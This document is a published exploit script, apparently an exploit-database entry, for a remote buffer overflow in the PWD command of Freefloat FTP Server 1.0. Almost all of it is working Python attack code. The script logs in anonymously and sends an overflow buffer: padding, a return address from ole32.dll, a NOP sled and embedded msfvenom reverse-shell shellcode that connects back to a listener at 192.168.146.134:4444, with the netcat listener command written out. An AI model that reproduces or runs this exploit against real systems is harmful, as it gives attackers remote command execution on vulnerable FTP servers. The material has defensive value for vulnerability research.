Authored by Waqas Ahmed Faroouqi

Freefloat FTP Server version 1.0 suffers from a remote buffer overflow vulnerability.

#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow
#Date: 08/22/2023
#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)
#Vendor Homepage: http://www.freefoat.com
#Version: 1.0
#Tested on Windows XP SP3


#!/usr/bin/python

import socket

#Metasploit shellcode (windows/shell_reverse_tcp, encoded to avoid the bad chars \x00 and \x0d; 351 bytes once encoded)
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d'

#nc -lvp 4444
#Send exploit


#offset = 247                      (bytes of padding before the saved return address is overwritten)
#badchars = \x00\x0d               (note: \x0a is not excluded here, but the buffer goes out as one FTP command line)
#return_address = \x3b\x69\x5a\x77 (0x775a693b little-endian, in ole32.dll of the tested Windows XP SP3 build; expect it to differ on other builds/patch levels)

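# Overflow layout for the 'PWD' argument, using the author's numbers from the header:
# 247 bytes of padding, a 4-byte return address from ole32.dll, a short NOP pad, then the
# encoded reverse-shell payload. Everything is built as bytes so it can be handed straight
# to the socket on Python 3 as well as Python 2.
OFFSET = 247                  # padding before EIP is overwritten
RET = b"\x3b\x69\x5a\x77"     # 0x775a693b little-endian, ole32.dll (XP SP3 build);
                              # presumably a jmp/call esp-style gadget - confirm before reuse
NOP_SLED = b"\x90" * 10       # small pad between the return address and the decoder stub

# msfvenom windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' (351 bytes).
# The listener (nc -lvp 4444) must be up on LHOST before the buffer is sent.
payload = (
    b"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"
    b"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"
    b"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"
    b"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"
    b"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"
    b"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"
    b"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"
    b"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"
    b"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"
    b"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"
    b"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"
    b"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"
    b"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"
    b"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"
    b"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"
    b"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"
    b"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"
    b"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"
    b"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"
    b"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"
    b"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"
    b"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"
    b"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"
    b"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"
    b"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"
    b"\x19"
)

# Final buffer handed to the PWD command: 247 + 4 + 10 + 351 = 612 bytes.
shellcode = b"A" * OFFSET + RET + NOP_SLED + payload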

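def main(ip='192.168.146.135', port=21, timeout=10.0):
    """Log in to the target FTP server anonymously and send the oversized PWD argument.

    The original script authenticates before sending the overflow; whether the PWD
    handler is reachable without a login is not shown here, so the same order is kept.

    Args:
        ip: target host running Freefloat FTP Server 1.0 (default is the author's lab box).
        port: FTP control port.
        timeout: per-operation socket timeout in seconds, so an unresponsive target (or a
            service that dies before answering) does not hang the script forever.

    Raises:
        ValueError: if the crafted buffer contains a byte the FTP command line cannot carry.
        socket.error: on connect/send failure.
    """
    # \x00 and \x0d are the author's bad chars (see the msfvenom line at the top of the
    # file). \x0a is not in that list, but the buffer is delivered as a single FTP command
    # line, so a stray LF inside it would most likely end the command early; refuse to send
    # rather than silently truncate the overflow string.
    for bad in (b"\x00", b"\x0d", b"\x0a"):
        if bad in shellcode:
            raise ValueError("buffer contains bad char %r" % bad)

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((ip, port))
        sock.recv(1024)  # banner
        # sendall() rather than send(): send() may write only part of the buffer, and a
        # partial overflow string would never reach the saved return address.
        sock.sendall(b'USER anonymous\r\n')
        sock.recv(1024)
        sock.sendall(b'PASS anonymous\r\n')
        sock.recv(1024)
        sock.sendall(b'pwd ' + shellcode + b'\r\n')
        # Give the server a moment to consume the line before tearing the connection down;
        # a crash, reset or timeout here is expected once the overflow lands, so it is
        # deliberately ignored.
        try:
            sock.recv(1024)
        except socket.error:
            pass
    finally:
        sock.close()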

# Only fire when run as a script; importing the module just defines the buffer and main().
if __name__ == "__main__":
    main()